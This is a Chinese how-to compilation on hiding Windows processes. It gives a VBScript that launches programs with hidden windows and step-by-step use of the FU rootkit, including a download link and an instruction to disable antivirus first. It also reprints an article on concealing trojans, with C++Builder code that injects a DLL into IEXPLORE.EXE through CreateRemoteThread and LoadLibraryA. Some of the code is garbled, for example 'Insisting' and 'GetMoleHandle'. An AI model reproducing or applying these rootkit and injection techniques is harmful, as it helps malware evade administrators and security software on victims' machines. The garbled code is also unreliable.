如何隱藏遠程軟體和進程

㈠ 誰有win10隱藏進程軟體 或者怎麼隱藏

方法一：使用VBScript
1、首先以隱藏系統自帶的Win32版《寫字板》程序為例，在記事本中寫入如下代碼： Dim WShell Set WShell = CreateObject("WScript.Shell") WShell.Run "wordpad.exe", 0 '後面0的意思是「隱藏」 Set WShell = Nothing 注意，代碼第三行後的單引號 ' 是VB中的注釋符號，其後面的語句沒有執行效果。

2、把上述代碼保存為.vbs格式，文件名自擬，如下圖——

3、此時雙擊剛剛保存的vbs文件就可以讓寫字板「隱身」運行，但我們還是可以在任務管理器中找到進程，如下圖——

4、如果想隱身運行第三方程序，則需要修改代碼，以軟媒魔方的清理大師文件為例，代碼如下： WShell.Run """" & "D:\Program Files (x86)\Ruanmei\PCMaster\cleanmaster.exe" & """", 0 '如果路徑中含有空格，就需要在路徑前後加引號和調用符號，格式為"""" & "路徑" & """" Set WShell = Nothing

5、按照第2步的方式保存後，雙擊可以查看效果。需要注意的是，如果程序本身需要管理員許可權，而且你的系統開啟了UAC，許可權請求的窗口是無法隱藏的，如下圖——

不過在點擊「是」之後就不會看到運行界面和任務欄圖標了，只能在任務管理器中找到進程，如下圖——

6、如果你想用命令提示符來運行這些vbs，可以採用如下命令格式： wscript "路徑\文件名.vbs" 實例： wscript "%userprofile%\Desktop\新建文件夾 (2)\hidewordpad.vbs"

運行效果和雙擊vbs文件本身是一致的。

㈡ 如何隱藏某個軟體的進程

1、下載FU，下載地址： http://clover.by168.com/fu.rar (失效能找的到）

2、關閉殺毒程序後解壓縮文件fu.rar。（因為FU是黑客軟體，會被殺毒的殺了）

3、解壓後可以看見fu下有三個子文件夾,分別是:EXE,fu和Sys

4、進入EXE文件夾，雙擊運行cmd.exe

5、打開第一個~~~~程序

6、查找程序PID。（分XP和其他系統說明）

XP系統：在剛才運行的cmd.exe黑色輸入窗口下輸入tasklist，回車。可以看到程序的PID值。

其他系統：打開任務管理器在進程的選項欄下就可以看見程序PID值。開任務管理器的方法是按三鍵：Ctrl+Alt+Del，注意是三鍵同時按。還有一種打開任務管理器的方法是右鍵單擊任務欄，然後就有任務管理器這個選項。（由於其他系統無tasklist這個命令，所以輸入tasklist會顯示tasklist不是內部或外部命令。）
任務管理器-----查看-----選擇列------把PID勾選上

7、在cmd.exe的窗口下輸入：fu -ph 1180（1180即所查的PID值，你查到什麼就是什麼啰）

fu和-ph和PID值三者之間都有空格呀！

8、這樣程序進程都被屏蔽了。關閉cmd的窗口。可以打開防火牆了

9、可以雙開了，再打開一個相同程序沒問題了~
說明：fu軟體為黑客軟體，
殺毒軟體可能會認為是木馬(因為要隱藏外掛進程,木馬一般要隱藏進程的)，
請在使用前關閉殺毒軟體，然後運行結束後再打開。
我們是經過測試的,如果你信不過我們的提供的fu,
你也可以到官方下載

㈢ Windows NT/系統進程的隱藏技術

摘要 進程的隱藏一直是木馬程序設計者不斷探求的重要技術，本文採用遠程線程技術，通過動態鏈接庫 方法 ，較好地解決了這一 問題 ，通過遠程線程將木馬作為線程隱藏在其他進程中，從而達到隱藏的目的。

關鍵字進程 線程 木馬 動態鏈接庫

木馬程序(也稱後門程序)是能被控制的運行在遠程主機上的程序，由於木馬程序是運行在遠程主機上，所以進程的隱藏無疑是大家關心的焦點。

本文 分析 了Windows NT/2000系統下進程隱藏的基本技術和方法，並著重討論運用線程嫁接技術如何實現Windows NT/2000系統中進程的隱藏。

1 基本原理

在WIN95/98中，只需要將進程注冊為系統服務就能夠從進程查看器中隱形，可是這一切在Windows NT/2000中卻完全不同， 無論木馬從埠、啟動文件上如何巧妙地隱藏自己，始終都不能躲過Windows NT/2000的任務管理器，Windows NT/2000的任務管理器均能輕松顯示出木馬進程，難道在Windows NT/2000下木馬真的再也無法隱藏自己的進程了？我們知道，在WINDOWS系統下，可執行文件主要是Exe和Com文件，這兩種文件在運行時都有一個共同點，會生成一個獨立的進程，尋找特定進程是我們發現木馬的方法之一，隨著入侵檢測軟體的不斷 發展 ，關聯進程和SOCKET已經成為流行的技術，假設一個木馬在運行時被檢測軟體同時查出埠和進程，我們基本上認為這個木馬的隱藏已經完全失敗。在Windows NT/2000下正常情況用戶進程對於系統管理員來說都是可見的，要想做到木馬的進程隱藏，有兩個辦法，第一是讓系統管理員看不見你的進程；第二是不使用進程。本文以第二種方法為例加以討論，其基本原理是將自已的木馬以線程方式嫁接於遠程進程之中，遠程進程則是合法的用戶程序，這樣用戶管理者看到的只是合法進程，而無法發現木馬線程的存在，從而達到隱藏的目的。

2 實現方法

為了弄清實現方法，我們必須首先了解Windows系統的另一種"可執行文件"----DLL，DLL是Dynamic Link Library（動態鏈接庫）的縮寫，DLL文件是Windows的基礎，因為所有的API函數都是在DLL中實現的。DLL文件沒有程序邏輯，是由多個功能函數構成，它並不能獨立運行，一般都是由進程載入並調用的。因為DLL文件不能獨立運行，所以在進程列表中並不會出現DLL，假設我們編寫了一個木馬DLL，並且通過別的進程來運行它，那麼無論是入侵檢測軟體還是進程列表中，都只會出現那個進程而並不會出現木馬DLL，如果那個進程是可信進程，（例如瀏覽器程序IEXPLORE.EXE，沒人會懷疑它是木馬吧？）那麼我們編寫的DLL作為那個進程的一部分，也將成為被信賴的一員，也就達到了隱藏的目的。

運行DLL方法有多種，但其中最隱蔽的.方法是採用動態嵌入技術，動態嵌入技術指的是將自己的代碼嵌入正在運行的進程中的技術。 理論 上來說，在Windows中的每個進程都有自己的私有內存空間，別的進程是不允許對這個私有空間進行操作的，但是實際上，我們仍然可以利用種種方法進入並操作進程的私有內存。動態嵌入技術有多種如：窗口Hook、掛接API、遠程線程等，這里介紹一下遠程線程技術，它只要有基本的進線程和動態鏈接庫的知識就可以很輕松地完成動態嵌入。

遠程線程技術指的是通過在另一個進程中創建遠程線程的方法進入那個進程的內存地址空間。我們知道，在進程中，可以通過CreateThread函數創建線程，被創建的新線程與主線程（就是進程啟動時被同時自動建立的那個線程）共享地址空間以及其他的資源。但是很少有人知道，通過CreateRemoteThread也同樣可以在另一個進程內創建新線程，被創建的遠程線程同樣可以共享遠程進程（是遠程進程）的地址空間，所以，實際上，我們通過一個遠程線程，進入了遠程進程的內存地址空間，也就擁有了那個遠程進程相當的許可權。

3 實施步驟

1） 用Process32Next（）函數找到宿主進程,獲取宿主進程ID,並用

OpenProcess（）函數打開宿主進程。

2） 用VirtualAllocEx（）函數分配遠程進程地址空間中的內存。

3） 用WriteProcessMemory（）函數將待隱藏的DLL的路徑名。

4） 拷貝到步驟二已經分配的內存中。

5） 用GetProcAddress（）函數獲取LoadlibraryA（）函數的實地址（在kernel32.dll中）。

6） 用CreateRemoteThread（）函數在遠程進程中創建一個線程。

7） 它調用正確的LoadlibraryA（）函數。

8） 為它傳遞步驟二中分配的內存地址。

4 具體實例

下面是在C++Builder 4.0環境下編寫的運用遠程線程技術隱藏木馬的程序代碼：

#include

#include

#include

#include//該頭文件包涵了進程操作的API函數

#pragma hdrstop

#include "Unit1.h"

#pragma package(smart_init)

#pragma resource "*.dfm"

Insisting pszLibFileName;//存放待隱藏的DLL文件名

HANDLE hProcessSnap=NULL;//進程快照句柄

HANDLE hRemoteProcess;//遠程進程句柄

LPVOID pszLibFileRemote;//遠程進程中分配給文件名的空間

HMODULE phmd;//存放kernel32.dll句柄

HANDLE hRemoteThread1=NULL;//存放遠程線程句柄

TForm1 *Form1;

//---------------------------------------------------------

__fast call TForm1::TForm1(TComponent* Owner)

: TForm(Owner)

{

}

//---------------------------------------------------------

void __fastcall TForm1::Button1Click(TObject *Sender)

{

PROCESSENTRY32 pe32={0};

DWORD dwRemoteProcessId;

hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

//打開進程快照

if(hProcessSnap==(HANDLE)-1)

{

MessageBox(NULL,"CreateToolhelp32Snapshot failed","",MB_OK);

exit(0);

} //失敗返回

pe32.dwSize=sizeof(PROCESSENTRY32);

if(Process32First(hProcessSnap,&pe32)) //獲取第一個進程

{

do{

AnsiString te;

te=pe32.szExeFile;

if(te.Pos("iexplore.exe")|| te.Pos("IEXPLORE.EXE"))

//找到宿主進程，以IEXPLORE.EXE為例

{ dwRemoteProcessId=pe32.th32ProcessID;

break;

}

}

while(Process32Next(hProcessSnap,&pe32));//獲取下一個進程

}

else

{

MessageBox(NULL,"取第一個進程失敗","",MB_OK);

exit(0);

}

hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM

_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);

//打開遠程進程

pszLibFileName=GetCurrentDir()+""+"hide.dll";

// 假設hide.dll是待隱藏的進程

int cb=(1+pszLibFileName.Length())*sizeof(char);// 計算 dll文件名長度

pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,

MEM_COMMIT,PAGE_READWRITE);

//申請存放文件名的空間

BOOL ReturnCode=WriteProcessMemory(hRemoteProcess,

pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);

//把dll文件名寫入申請的空間

phmd=GetMoleHandle("kernel32.dll");

LPTHREAD_START_ROUTINE fnStartAddr=(LPTHREAD_START_ROUTINE)

GetProcAddress(phmd,"LoadLibraryA");

//獲取動態鏈接庫函數地址

hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,

pfnStartAddr,pszLibFileRemote,0,NULL);

//創建遠程線程

if(hRemoteThread1!=NULL)

CloseHandle(hRemoteThread1);//關閉遠程線程

if(hProcessSnap!=NULL)

CloseHandle(hProcessSnap);//關閉進程快照

}

該程序編譯後命名為RmtDll.exe,運行時點擊界面上的按鈕即可。

至此，遠程嵌入順利完成，為了試驗我們的hide.dll是不是已經正常地在遠程線程運行，我同樣在C++Builder4.0環境下編寫並編譯了下面的hide.dll作為測試：

#include

#include

#pragma hdrstop

#pragma argsused

BOOL WINAPI DllEntryPoint(HINSTANCE hinst, unsigned long reason, void* lpReserved)

{

char szProcessId[64];

switch(reason)

{

case DLL_PROCESS_ATTACH:

{//獲取當前進程ID

itoa(GetCurrentProcessId(),szProcessId,10);

MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);

break;

}

default:

}

return TRUE;

}

當使用RmtDll.exe程序將這個hide.dll嵌入IEXPLORE.EXE進程後假設PID=1208），該測試DLL彈出了1208字樣的確認框，同時使用PS工具

也能看到:

Process ID: 1208

C:WINNTIEXPLORE.EXE (0x00400000)

……

C:WINNThide.dll (0x100000000)

……

這證明hide.dll已經在IEXPLORE.EXE進程內正確地運行了。上面程序的頭文件由編譯器自動生成，未作改動，故略之。

5 結束語

進程隱藏技術和 方法 有很多，而且這一技術 發展 也相當快，本文僅從一個側面加以討論，希望通過這一探討讓我們對進程隱藏技術有一個更清楚的認識，同時也為我們防範他人利用進程隱藏手段非法入侵提供 參考 ，本文拋磚引玉，不當之處誠懇批評指正。

參考 文獻

1 Jeffrey Richter著 王建華、張煥生、侯麗坤等譯 Windows核心編程 機械 工業 出版社2

K．賴斯多夫 H. 亨德森著 希望圖書創作室譯 Borland C++ Builder 實用培訓教程.

㈣ 怎麼隱藏進程

步驟/方法

• 在網路上面搜索HideToolz ，打開第一個搜索結果，點擊進入下載。把HideToolz 下載到你的電腦裡面。

• 滑鼠雙擊打開該壓縮包，再直接雙擊該軟體即可打開該軟體了。並且在軟體裡面可以看見目前的進程數為多少個。

• 按Ctrl + Alt + . 【啟動任務管理器】，在 HideToolz 裡面找到你想要隱藏的運行程序，滑鼠單擊右鍵——選擇隱藏，然後在任務管理器裡面就很清楚的看見你想隱藏的運行程序已經不見了。

• 既然隱藏了運行程序，那麼想顯示出來了又該怎麼辦呢？在 HideToolz 裡面找到你已經隱藏了的運行程序，滑鼠單擊右鍵——選擇顯示即可。

• 當然，運行 HideToolz 的時候最好也把 HideToolz 的托盤圖標也隱藏了。

  
  

圖解教程：http://jingyan..com/article/75ab0bcb17c66cd6874db278.html

注意事項

HideToolz 下載方式如下圖所示：

除了第三方軟體可以隱藏進程，還有使用其他的方法也可以隱藏進程，不過相比較第三方軟體去隱藏進程的步驟要復雜些。